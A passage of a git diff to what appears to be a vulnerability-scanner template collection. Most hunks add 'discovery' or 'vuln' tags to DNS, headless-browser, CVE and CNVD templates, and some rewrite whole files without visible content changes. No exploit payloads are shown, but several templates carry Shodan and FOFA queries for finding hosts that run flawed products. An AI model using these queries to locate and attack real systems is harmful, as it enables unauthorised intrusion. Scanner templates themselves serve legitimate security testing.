type: word + name: "safeway" + words: + - "safeway.com" + + - type: word + name: "mark-monitor" + words: + - "markmonitor.com" + - "markmonitor.zone" + + - type: word + name: "hetznet" + words: + - "hetzner.com" + + - type: word + name: "edge-cast" + words: - "edgecastdns.net" # digest: 4a0a00473045022100fdf29b4763aad683f26f0a177a2caea39237e2c9d09914b5e2b6bcdf4133e2af0220260f903c6023e996f838bbe6b7366e690e793e6c5d7433827da087eb6d7a97d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index 3284491d014..17d0a1ff7bb 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml @@ -1,5 +1,5 @@ -id: spf-record-detect - +id: spf-record-detect + info: name: SPF Record - Detection author: rxerium @@ -10,17 +10,17 @@ info: - https://www.mimecast.com/content/how-to-create-an-spf-txt-record metadata: max-request: 1 - tags: dns,spf -dns: - - name: "{{FQDN}}" - type: TXT - matchers: - - type: word - words: - - "v=spf1" - - extractors: - - type: regex - regex: + tags: dns,spf,discovery +dns: + - name: "{{FQDN}}" + type: TXT + matchers: + - type: word + words: + - "v=spf1" + + extractors: + - type: regex + regex: - "v=spf1(.+)" # digest: 4a0a00473045022100f13ebb9dda6d31f94b1a2413b025ad9c62554f6d88e902c186bdd39445375d8c02200d4ab1bcf5289bbc4943a635002af2f6aff29502bd96dc1387fc60c16b949ac2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/spoofable-spf-records-ptr.yaml b/dns/spoofable-spf-records-ptr.yaml index 878187a01ff..edbac9dff9a 100644 --- a/dns/spoofable-spf-records-ptr.yaml +++ b/dns/spoofable-spf-records-ptr.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,spf + tags: dns,spf,discovery dns: - name: "{{FQDN}}" diff --git a/dns/txt-fingerprint.yaml b/dns/txt-fingerprint.yaml index b8232db17b0..b7f1c15ccb1 100644 --- a/dns/txt-fingerprint.yaml +++ b/dns/txt-fingerprint.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,txt + tags: dns,txt,discovery dns: - name: "{{FQDN}}" diff --git a/dns/txt-service-detect.yaml b/dns/txt-service-detect.yaml index 1e08256bb3d..15e44f1fd59 100644 --- a/dns/txt-service-detect.yaml +++ b/dns/txt-service-detect.yaml @@ -1,226 +1,226 @@ -id: txt-service-detect - -info: - name: DNS TXT Service - Detect - author: rxerium - severity: info - description: | - Finding the services companies use via their TXT records. - reference: - - https://www.abenezer.ca/blog/services-companies-use-txt-records - metadata: - verified: true - max-request: 1 - tags: dns,txt,txt-service - -dns: - - name: "{{FQDN}}" - type: TXT - - matchers-condition: or - matchers: - - type: word - name: "keybase" - words: - - "keybase-site-verification" - - - type: word - name: "salesloft-drift" - words: - - "drift-domain-verification" - - - type: word - name: "proton-mail" - words: - - "protonmail-verification" - - - type: word - name: "webex" - words: - - "webexdomainverification" - - - type: word - name: "apple" - words: - - "apple-domain-verification" - - - type: word - name: "facebook" - words: - - "facebook-domain-verification" - - - type: word - name: "autodesk" - words: - - "autodesk-domain-verification" - - - type: word - name: "stripe" - words: - - "stripe-verification" - - - type: word - name: "atlassian" - words: - - "atlassian-domain-verification" - - - type: word - name: "adobe-sign" - words: - - "adobe-sign-verification" - - - type: word - name: "zoho" - words: - - "zoho-verification" - - - type: word - name: "have-i-been-pwned" - words: - - "have-i-been-pwned-verification" - - - type: word - name: "knowbe4" - words: - - "knowbe4-site-verification" - - - type: word - name: "jamf" - words: - - "jamf-site-verification" - - - type: word - name: "parallels" - words: - - "parallels-domain-verification" - - - type: word - name: "dropbox" - words: - - "dropbox-domain-verification" - - - type: word - name: "vmware-cloud" - words: - - "vmware-cloud-verification" - - - type: word - name: "canva" - words: - - "canva-site-verification" - - - type: word - name: "mongodb" - words: - - "mongodb-site-verification" - - - type: word - name: "slack" - words: - - "slack-domain-verification" - - - type: word - name: "teamViewer" - words: - - "teamviewer-sso-verification" - - - type: word - name: "bugcrowd" - words: - - "bugcrowd-verification" - - - type: word - name: "cisco" - words: - - "cisco-site-verification" - - - type: word - name: "palo-alto-networks" - words: - - "paloaltonetworks-site-verification" - - - type: word - name: "twilio" - words: - - "twilio-domain-verification" - - - type: word - name: "dell-technologies" - words: - - "dell-technologies-domain-verification" - - - type: word - name: "1password" - words: - - "1password-site-verification" - - - type: word - name: "duo" - words: - - "duo_sso_verification" - - - type: word - name: "sophos" - words: - - "sophos-domain-verification" - - - type: word - name: "pinterest" - words: - - "pinterest-site-verification" - - - type: word - name: "citrix" - words: - - "citrix-verification-code" - - - type: word - name: "zapier" - words: - - "zapier-domain-verification-challenge" - - - type: word - name: "uber" - words: - - "uber-domain-verification" - - - type: word - name: "zoom" - words: - - "zoom-domain-verification" - - - type: word - name: "lastpass" - words: - - "lastpass-verification-code" - - - type: word - name: "google-workspace" - words: - - "google-site-verification" - - - type: word - name: "flexera" - words: - - "flexera-domain-verification" - - - type: word - name: "yandex" - words: - - "yandex-verification" - - - type: word - name: "calendly" - words: - - "calendly-site-verification" - - - type: word - name: "docusign" - words: - - "docusign" - - - type: word - name: "whimsical" - words: +id: txt-service-detect + +info: + name: DNS TXT Service - Detect + author: rxerium + severity: info + description: | + Finding the services companies use via their TXT records. + reference: + - https://www.abenezer.ca/blog/services-companies-use-txt-records + metadata: + verified: true + max-request: 1 + tags: dns,txt,txt-service,discovery + +dns: + - name: "{{FQDN}}" + type: TXT + + matchers-condition: or + matchers: + - type: word + name: "keybase" + words: + - "keybase-site-verification" + + - type: word + name: "salesloft-drift" + words: + - "drift-domain-verification" + + - type: word + name: "proton-mail" + words: + - "protonmail-verification" + + - type: word + name: "webex" + words: + - "webexdomainverification" + + - type: word + name: "apple" + words: + - "apple-domain-verification" + + - type: word + name: "facebook" + words: + - "facebook-domain-verification" + + - type: word + name: "autodesk" + words: + - "autodesk-domain-verification" + + - type: word + name: "stripe" + words: + - "stripe-verification" + + - type: word + name: "atlassian" + words: + - "atlassian-domain-verification" + + - type: word + name: "adobe-sign" + words: + - "adobe-sign-verification" + + - type: word + name: "zoho" + words: + - "zoho-verification" + + - type: word + name: "have-i-been-pwned" + words: + - "have-i-been-pwned-verification" + + - type: word + name: "knowbe4" + words: + - "knowbe4-site-verification" + + - type: word + name: "jamf" + words: + - "jamf-site-verification" + + - type: word + name: "parallels" + words: + - "parallels-domain-verification" + + - type: word + name: "dropbox" + words: + - "dropbox-domain-verification" + + - type: word + name: "vmware-cloud" + words: + - "vmware-cloud-verification" + + - type: word + name: "canva" + words: + - "canva-site-verification" + + - type: word + name: "mongodb" + words: + - "mongodb-site-verification" + + - type: word + name: "slack" + words: + - "slack-domain-verification" + + - type: word + name: "teamViewer" + words: + - "teamviewer-sso-verification" + + - type: word + name: "bugcrowd" + words: + - "bugcrowd-verification" + + - type: word + name: "cisco" + words: + - "cisco-site-verification" + + - type: word + name: "palo-alto-networks" + words: + - "paloaltonetworks-site-verification" + + - type: word + name: "twilio" + words: + - "twilio-domain-verification" + + - type: word + name: "dell-technologies" + words: + - "dell-technologies-domain-verification" + + - type: word + name: "1password" + words: + - "1password-site-verification" + + - type: word + name: "duo" + words: + - "duo_sso_verification" + + - type: word + name: "sophos" + words: + - "sophos-domain-verification" + + - type: word + name: "pinterest" + words: + - "pinterest-site-verification" + + - type: word + name: "citrix" + words: + - "citrix-verification-code" + + - type: word + name: "zapier" + words: + - "zapier-domain-verification-challenge" + + - type: word + name: "uber" + words: + - "uber-domain-verification" + + - type: word + name: "zoom" + words: + - "zoom-domain-verification" + + - type: word + name: "lastpass" + words: + - "lastpass-verification-code" + + - type: word + name: "google-workspace" + words: + - "google-site-verification" + + - type: word + name: "flexera" + words: + - "flexera-domain-verification" + + - type: word + name: "yandex" + words: + - "yandex-verification" + + - type: word + name: "calendly" + words: + - "calendly-site-verification" + + - type: word + name: "docusign" + words: + - "docusign" + + - type: word + name: "whimsical" + words: - "whimsical" # digest: 490a0046304402202a7ba8e9d25bb84d778fba1664b074a382f595c8892505a24edf783ce07d288202201cf6e4f1ff07cef8bb8717d3495177afcffec9f5799b5c6a95adbd17b29aa54b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/worksites-detection.yaml b/dns/worksites-detection.yaml index 366316e3dc3..8a462550515 100644 --- a/dns/worksites-detection.yaml +++ b/dns/worksites-detection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,service + tags: dns,service,discovery dns: - name: "{{FQDN}}" diff --git a/headless/cookie-consent-detection.yaml b/headless/cookie-consent-detection.yaml index 0c3e598176a..ff685a44ed4 100644 --- a/headless/cookie-consent-detection.yaml +++ b/headless/cookie-consent-detection.yaml @@ -1,34 +1,34 @@ -id: cookie-consent-detection - -info: - name: Cookie Consent Detection - author: rxerium - severity: info - description: | - This template detects the presence of cookie consent forms - tags: headless,cookie,detect - -headless: - - steps: - - action: navigate - args: - url: "{{BaseURL}}" - - action: waitload - - matchers-condition: and - matchers: - - type: word - name: keyword - words: - - 'cookie-consent' - - 'cookie-popup' - - 'cookie-notice' - - 'We use cookies' - - 'Manage privacy preferences' - - 'Accept all cookies' - condition: or - - - type: status - status: +id: cookie-consent-detection + +info: + name: Cookie Consent Detection + author: rxerium + severity: info + description: | + This template detects the presence of cookie consent forms + tags: headless,cookie,detect,discovery + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + - action: waitload + + matchers-condition: and + matchers: + - type: word + name: keyword + words: + - 'cookie-consent' + - 'cookie-popup' + - 'cookie-notice' + - 'We use cookies' + - 'Manage privacy preferences' + - 'Accept all cookies' + condition: or + + - type: status + status: - 200 # digest: 4b0a004830460221008c4ed2a73ff3d13126074fc7e0f61cbe18b617cf6fb60ce4e285943e3832141b022100ea2ecad18d754ec0ef9cce7c4089d5d16ca088e62843aefd016c169d4b7c968d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index 28556f43bd7..ba062be12dd 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -32,7 +32,7 @@ info: - http.component:"swagger" - http.favicon.hash:"-1180440057" fofa-query: icon_hash="-1180440057" - tags: headless,cve,cve2018,swagger,xss,smartbear + tags: headless,cve,cve2018,swagger,xss,smartbear,vuln headless: - steps: diff --git a/headless/cves/2022/CVE-2022-29455-headless.yaml b/headless/cves/2022/CVE-2022-29455-headless.yaml index 7ec4c5c8e43..814b6e46650 100644 --- a/headless/cves/2022/CVE-2022-29455-headless.yaml +++ b/headless/cves/2022/CVE-2022-29455-headless.yaml @@ -30,7 +30,7 @@ info: vendor: elementor product: website_builder framework: wordpress - tags: cve,cve2022,xss,wordpress,elementor + tags: cve,cve2022,xss,wordpress,elementor,vuln headless: - steps: diff --git a/headless/cves/2024/CVE-2024-29882.yaml b/headless/cves/2024/CVE-2024-29882.yaml index 87504af75e7..6d382a084a5 100644 --- a/headless/cves/2024/CVE-2024-29882.yaml +++ b/headless/cves/2024/CVE-2024-29882.yaml @@ -22,7 +22,7 @@ info: vendor: ossrs product: simple_realtime_server shodan-query: http.favicon.hash:1386054408 - tags: cve,cve2023,srs,dom,xss + tags: cve,cve2023,srs,dom,xss,vuln headless: - steps: diff --git a/headless/cves/2024/CVE-2024-38526.yaml b/headless/cves/2024/CVE-2024-38526.yaml index 5a6caa88e21..1e2601f28c6 100644 --- a/headless/cves/2024/CVE-2024-38526.yaml +++ b/headless/cves/2024/CVE-2024-38526.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2024-38526 epss-score: 0.78221 - epss-percentile: 0.98971 - tags: cve,cve2024,supply-chain,polyfill,vkev + epss-percentile: 0.98968 + tags: cve,cve2024,supply-chain,polyfill,vkev,vuln headless: - steps: - args: diff --git a/headless/cves/2025/CVE-2025-24752.yaml b/headless/cves/2025/CVE-2025-24752.yaml index 7dd6e40b562..491c99eb41f 100644 --- a/headless/cves/2025/CVE-2025-24752.yaml +++ b/headless/cves/2025/CVE-2025-24752.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 fofa-query: body="/wp-content/plugins/essential-addons-for-elementor-lite" - tags: cve,cve2025,xss,essential,elementor-lite,vkev + tags: cve,cve2025,xss,essential,elementor-lite,vkev,vuln variables: random_int: '{{rand_int(1,1000)}}' diff --git a/headless/cves/2025/CVE-2025-25062.yaml b/headless/cves/2025/CVE-2025-25062.yaml index 8bfdf1746cc..258c85662fc 100644 --- a/headless/cves/2025/CVE-2025-25062.yaml +++ b/headless/cves/2025/CVE-2025-25062.yaml @@ -22,7 +22,7 @@ info: metadata: max-request: 7 shodan-query: "Backdrop CMS" - tags: cve,cve2025,xss,stored,backdrop,headless + tags: cve,cve2025,xss,stored,backdrop,headless,vuln variables: username: "{{username}}" diff --git a/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml b/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml index e661e84f0cc..8d9052b2462 100644 --- a/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml +++ b/headless/cves/2025/CVE-2025-29927-HEADLESS.yaml @@ -21,7 +21,7 @@ info: vendor: vercel product: Next.js framework: node.js - tags: cve,cve2025,headless,nextjs,vkev,passive + tags: cve,cve2025,headless,nextjs,vkev,passive,vuln headless: - steps: diff --git a/headless/cves/2025/CVE-2025-50738.yaml b/headless/cves/2025/CVE-2025-50738.yaml index c6744b935f6..141f1b7a793 100644 --- a/headless/cves/2025/CVE-2025-50738.yaml +++ b/headless/cves/2025/CVE-2025-50738.yaml @@ -17,7 +17,7 @@ info: metadata: verified: true max-request: 3 - tags: cve,cve2025,xss,memos,authenticated,headless + tags: cve,cve2025,xss,memos,authenticated,headless,vuln variables: username: "{{username}}" diff --git a/headless/cves/2025/CVE-2025-8191.yaml b/headless/cves/2025/CVE-2025-8191.yaml index 81bb42104a8..087a8ba8fef 100644 --- a/headless/cves/2025/CVE-2025-8191.yaml +++ b/headless/cves/2025/CVE-2025-8191.yaml @@ -28,7 +28,7 @@ info: - http.favicon.hash:"-1180440057" fofa-query: icon_hash="-1180440057" zoomeye-query: app:"Swagger UI" - tags: cve,cve2025,headless,swagger,xss,smartbear,dom-xss + tags: cve,cve2025,headless,swagger,xss,smartbear,dom-xss,vuln headless: - steps: diff --git a/headless/dvwa-headless-automatic-login.yaml b/headless/dvwa-headless-automatic-login.yaml index ed1866beaa7..6d02dc58999 100644 --- a/headless/dvwa-headless-automatic-login.yaml +++ b/headless/dvwa-headless-automatic-login.yaml @@ -4,7 +4,7 @@ info: name: DVWA Headless Automatic Login author: pdteam severity: high - tags: headless,dvwa + tags: headless,dvwa,vuln headless: - steps: diff --git a/headless/extract-urls.yaml b/headless/extract-urls.yaml index fb84c6bd1be..b543473ab98 100644 --- a/headless/extract-urls.yaml +++ b/headless/extract-urls.yaml @@ -4,7 +4,7 @@ info: name: Extract URLs from HTML attributes author: dwisiswant0 severity: info - tags: headless,extractor + tags: headless,extractor,discovery headless: - steps: diff --git a/headless/headless-open-redirect.yaml b/headless/headless-open-redirect.yaml index e110cc365ae..3ad9c9c8e8c 100644 --- a/headless/headless-open-redirect.yaml +++ b/headless/headless-open-redirect.yaml @@ -10,7 +10,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect,generic,headless + tags: redirect,generic,headless,vuln headless: - steps: diff --git a/headless/postmessage-outgoing-tracker.yaml b/headless/postmessage-outgoing-tracker.yaml index 6da6bdb0ea6..2aedfbd840a 100644 --- a/headless/postmessage-outgoing-tracker.yaml +++ b/headless/postmessage-outgoing-tracker.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://appcheck-ng.com/html5-cross-document-messaging-vulnerabilities/ - tags: headless,postmessage + tags: headless,postmessage,discovery headless: - steps: diff --git a/headless/postmessage-tracker.yaml b/headless/postmessage-tracker.yaml index 837b4285161..3024dbb9b90 100644 --- a/headless/postmessage-tracker.yaml +++ b/headless/postmessage-tracker.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js - tags: headless,postmessage + tags: headless,postmessage,discovery headless: - steps: diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml index b83ccb727fd..0c549c09249 100644 --- a/headless/prototype-pollution-check.yaml +++ b/headless/prototype-pollution-check.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 8 verified: true - tags: headless + tags: headless,vuln headless: - steps: diff --git a/headless/screenshot.yaml b/headless/screenshot.yaml index 91807fe0e37..7b0d82d9c34 100644 --- a/headless/screenshot.yaml +++ b/headless/screenshot.yaml @@ -5,7 +5,7 @@ info: author: V0idC0de,righettod,tarunKoyalwar severity: info description: Takes a screenshot of the specified URLS. - tags: headless,screenshot + tags: headless,screenshot,discovery variables: filename: '{{replace(BaseURL,"/","_")}}' diff --git a/headless/technologies/js-libraries-detect.yaml b/headless/technologies/js-libraries-detect.yaml index 69194cea8e0..7a03eabc6ec 100644 --- a/headless/technologies/js-libraries-detect.yaml +++ b/headless/technologies/js-libraries-detect.yaml @@ -7,7 +7,7 @@ info: description: Checks a target web app for inclusion of common JavaScript libraries metadata: max-request: 1 - tags: headless,tech,js + tags: headless,tech,js,discovery headless: - steps: diff --git a/headless/technologies/sap-spartacus.yaml b/headless/technologies/sap-spartacus.yaml index 4514cac7820..4652afadedf 100644 --- a/headless/technologies/sap-spartacus.yaml +++ b/headless/technologies/sap-spartacus.yaml @@ -9,7 +9,7 @@ info: - https://github.com/SAP/spartacus metadata: verified: true - tags: tech,sap,hybris,angular,spartacus,headless + tags: tech,sap,hybris,angular,spartacus,headless,discovery headless: - steps: diff --git a/headless/vulnerabilities/retool/retool-dom-xss.yaml b/headless/vulnerabilities/retool/retool-dom-xss.yaml index 68df39df6f2..e7c8515592a 100644 --- a/headless/vulnerabilities/retool/retool-dom-xss.yaml +++ b/headless/vulnerabilities/retool/retool-dom-xss.yaml @@ -11,7 +11,7 @@ info: max-request: 1 shodan-query: title:"Retool" fofa-query: body="Retool" - tags: headless,retool,dom,xss + tags: headless,retool,dom,xss,vuln variables: random_int: '{{rand_int(1,1000)}}' diff --git a/headless/webpack-sourcemap.yaml b/headless/webpack-sourcemap.yaml index dec1a1285cc..7b9a52e3c67 100644 --- a/headless/webpack-sourcemap.yaml +++ b/headless/webpack-sourcemap.yaml @@ -15,7 +15,7 @@ info: - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage metadata: max-request: 9 - tags: javascript,webpack,sourcemaps,headless + tags: javascript,webpack,sourcemaps,headless,vuln headless: - steps: - args: diff --git a/headless/window-name-domxss.yaml b/headless/window-name-domxss.yaml index a6289bf488c..3bfa12b44e2 100644 --- a/headless/window-name-domxss.yaml +++ b/headless/window-name-domxss.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: headless,xss,domxss + tags: headless,xss,domxss,vuln headless: - steps: diff --git a/http/cnvd/2017/CNVD-2017-03561.yaml b/http/cnvd/2017/CNVD-2017-03561.yaml index b60de3d9549..7f25f42c965 100644 --- a/http/cnvd/2017/CNVD-2017-03561.yaml +++ b/http/cnvd/2017/CNVD-2017-03561.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 fofa-query: app="泛微-eMobile" - tags: cnvd,cnvd2017,emobile,ognl,fanwei + tags: cnvd,cnvd2017,emobile,ognl,fanwei,vuln variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index 486752e13dd..fc45a8002ba 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 fofa-query: "app=\"dahua-DSS\"" - tags: cnvd,cnvd2017,sqli,dahua + tags: cnvd,cnvd2017,sqli,dahua,vuln variables: num: "999999999" diff --git a/http/cnvd/2018/CNVD-2018-13393.yaml b/http/cnvd/2018/CNVD-2018-13393.yaml index 91bed9d2618..25dd2ea6177 100644 --- a/http/cnvd/2018/CNVD-2018-13393.yaml +++ b/http/cnvd/2018/CNVD-2018-13393.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - tags: cnvd2018,cnvd,metinfo,cvnd2018,lfi + tags: cnvd2018,cnvd,metinfo,cvnd2018,lfi,vuln http: - method: GET diff --git a/http/cnvd/2019/CNVD-2019-01348.yaml b/http/cnvd/2019/CNVD-2019-01348.yaml index 1908d201fe8..44c8bd676ac 100644 --- a/http/cnvd/2019/CNVD-2019-01348.yaml +++ b/http/cnvd/2019/CNVD-2019-01348.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-284 metadata: max-request: 1 - tags: cnvd2019,cnvd,xiuno + tags: cnvd2019,cnvd,xiuno,vuln http: - method: GET diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml index 6fb75515d26..99ccc48580e 100644 --- a/http/cnvd/2019/CNVD-2019-06255.yaml +++ b/http/cnvd/2019/CNVD-2019-06255.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-77 metadata: max-request: 2 - tags: cnvd,cnvd2019,rce,catfishcms + tags: cnvd,cnvd2019,rce,catfishcms,vuln flow: http(1) && http(2) http: diff --git a/http/cnvd/2019/CNVD-2019-19299.yaml b/http/cnvd/2019/CNVD-2019-19299.yaml index f81d1e95847..a655e5f21c4 100644 --- a/http/cnvd/2019/CNVD-2019-19299.yaml +++ b/http/cnvd/2019/CNVD-2019-19299.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-77 metadata: max-request: 2 - tags: cnvd2019,cnvd,zhiyuan,rce,intrusive + tags: cnvd2019,cnvd,zhiyuan,rce,intrusive,vuln http: - raw: diff --git a/http/cnvd/2019/CNVD-2019-32204.yaml b/http/cnvd/2019/CNVD-2019-32204.yaml index 4a3bd6a7136..a064756e27a 100644 --- a/http/cnvd/2019/CNVD-2019-32204.yaml +++ b/http/cnvd/2019/CNVD-2019-32204.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: cnvd,cnvd2019,fanwei,rce + tags: cnvd,cnvd2019,fanwei,rce,vuln http: - raw: diff --git a/http/cnvd/2020/CNVD-2020-23735.yaml b/http/cnvd/2020/CNVD-2020-23735.yaml index 1e068911b08..46a0b7d5dc9 100644 --- a/http/cnvd/2020/CNVD-2020-23735.yaml +++ b/http/cnvd/2020/CNVD-2020-23735.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - tags: cnvd,cnvd2020,xunchi,lfi + tags: cnvd,cnvd2020,xunchi,lfi,vuln http: - method: GET diff --git a/http/cnvd/2020/CNVD-2020-26585.yaml b/http/cnvd/2020/CNVD-2020-26585.yaml index a0cf09d2a2e..31eda4a5095 100644 --- a/http/cnvd/2020/CNVD-2020-26585.yaml +++ b/http/cnvd/2020/CNVD-2020-26585.yaml @@ -18,7 +18,7 @@ info: verified: true max-request: 2 fofa-query: app="ShowDoc" - tags: cnvd,cnvd2020,showdoc,fileupload,intrusive + tags: cnvd,cnvd2020,showdoc,fileupload,intrusive,vuln variables: str1: "{{randstr}}" diff --git a/http/cnvd/2020/CNVD-2020-46552.yaml b/http/cnvd/2020/CNVD-2020-46552.yaml index 020eabc70bd..853c679fa4c 100644 --- a/http/cnvd/2020/CNVD-2020-46552.yaml +++ b/http/cnvd/2020/CNVD-2020-46552.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: cnvd,cnvd2020,sangfor,rce + tags: cnvd,cnvd2020,sangfor,rce,vuln http: - method: GET diff --git a/http/cnvd/2020/CNVD-2020-56167.yaml b/http/cnvd/2020/CNVD-2020-56167.yaml index 86c53b569ac..fc8a5bf747d 100644 --- a/http/cnvd/2020/CNVD-2020-56167.yaml +++ b/http/cnvd/2020/CNVD-2020-56167.yaml @@ -10,7 +10,7 @@ info: - https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner metadata: max-request: 1 - tags: cnvd,cnvd2020,ruijie,default-login + tags: cnvd,cnvd2020,ruijie,default-login,vuln http: - method: POST diff --git a/http/cnvd/2020/CNVD-2020-62422.yaml b/http/cnvd/2020/CNVD-2020-62422.yaml index e5d15b164f0..883ee71d9c3 100644 --- a/http/cnvd/2020/CNVD-2020-62422.yaml +++ b/http/cnvd/2020/CNVD-2020-62422.yaml @@ -9,7 +9,7 @@ info: - https://blog.csdn.net/m0_46257936/article/details/113150699 metadata: max-request: 1 - tags: cnvd,cnvd2020,lfi,seeyon + tags: cnvd,cnvd2020,lfi,seeyon,vuln http: - method: GET diff --git a/http/cnvd/2020/CNVD-2020-63964.yaml b/http/cnvd/2020/CNVD-2020-63964.yaml index b3b1d78a103..5dfe0aba904 100644 --- a/http/cnvd/2020/CNVD-2020-63964.yaml +++ b/http/cnvd/2020/CNVD-2020-63964.yaml @@ -16,7 +16,7 @@ info: product: jsherp shodan-query: http.favicon.hash:-1298131932 fofa-query: jshERP-boot - tags: cnvd,cnvd2020,jsherp,disclosure + tags: cnvd,cnvd2020,jsherp,disclosure,vuln http: - method: GET diff --git a/http/cnvd/2020/CNVD-2020-67113.yaml b/http/cnvd/2020/CNVD-2020-67113.yaml index 5b24ecb69e9..aed933ee401 100644 --- a/http/cnvd/2020/CNVD-2020-67113.yaml +++ b/http/cnvd/2020/CNVD-2020-67113.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 2 shodan-query: http.title:"H5S CONSOLE" - tags: cnvd,cnvd2020,h5s,unauth,h5sconsole + tags: cnvd,cnvd2020,h5s,unauth,h5sconsole,vuln http: - method: GET diff --git a/http/cnvd/2020/CNVD-2020-68596.yaml b/http/cnvd/2020/CNVD-2020-68596.yaml index 667cd374dae..56b0f178611 100644 --- a/http/cnvd/2020/CNVD-2020-68596.yaml +++ b/http/cnvd/2020/CNVD-2020-68596.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 3 - tags: cnvd,cnvd2020,weiphp,lfi + tags: cnvd,cnvd2020,weiphp,lfi,vuln http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-01931.yaml b/http/cnvd/2021/CNVD-2021-01931.yaml index 9954e36de83..c7c4a61a272 100644 --- a/http/cnvd/2021/CNVD-2021-01931.yaml +++ b/http/cnvd/2021/CNVD-2021-01931.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 2 - tags: cnvd,cnvd2021,ruoyi,lfi + tags: cnvd,cnvd2021,ruoyi,lfi,vuln http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-09650.yaml b/http/cnvd/2021/CNVD-2021-09650.yaml index ad4c4b0db6f..0ebcefcf32c 100644 --- a/http/cnvd/2021/CNVD-2021-09650.yaml +++ b/http/cnvd/2021/CNVD-2021-09650.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: cnvd,cnvd2021,ruijie,rce + tags: cnvd,cnvd2021,ruijie,rce,vuln http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-10543.yaml b/http/cnvd/2021/CNVD-2021-10543.yaml index 477c46674b0..0a9c4bdecf5 100644 --- a/http/cnvd/2021/CNVD-2021-10543.yaml +++ b/http/cnvd/2021/CNVD-2021-10543.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: cnvd,cnvd2021,config,exposure + tags: cnvd,cnvd2021,config,exposure,vuln http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-14536.yaml b/http/cnvd/2021/CNVD-2021-14536.yaml index 7512f6be0e7..42a13c2b1f5 100644 --- a/http/cnvd/2021/CNVD-2021-14536.yaml +++ b/http/cnvd/2021/CNVD-2021-14536.yaml @@ -17,7 +17,7 @@ info: fofa-query: title="RG-UAC登录页面" product: rg-uac vendor: ruijie - tags: cnvd2021,cnvd,ruijie,disclosure + tags: cnvd2021,cnvd,ruijie,disclosure,vuln http: - method: GET diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml index c27b7b6da87..4677baa7b4f 100644 --- a/http/cnvd/2021/CNVD-2021-15822.yaml +++ b/http/cnvd/2021/CNVD-2021-15822.yaml @@ -17,7 +17,7 @@ info: product: shopxo shodan-query: title:"ShopXO企业级B2C电商系统提供商" fofa-query: app="ShopXO企业级B2C电商系统提供商" - tags: cnvd2021,cnvd,shopxo,lfi + tags: cnvd2021,cnvd,shopxo,lfi,vuln http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index 2ce1cb349e7..b549c4cd2ff 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: max-request: 1 - tags: cnvd2021,cnvd,empirecms,xss,domxss + tags: cnvd2021,cnvd,empirecms,xss,domxss,vuln http: - method: GET diff --git 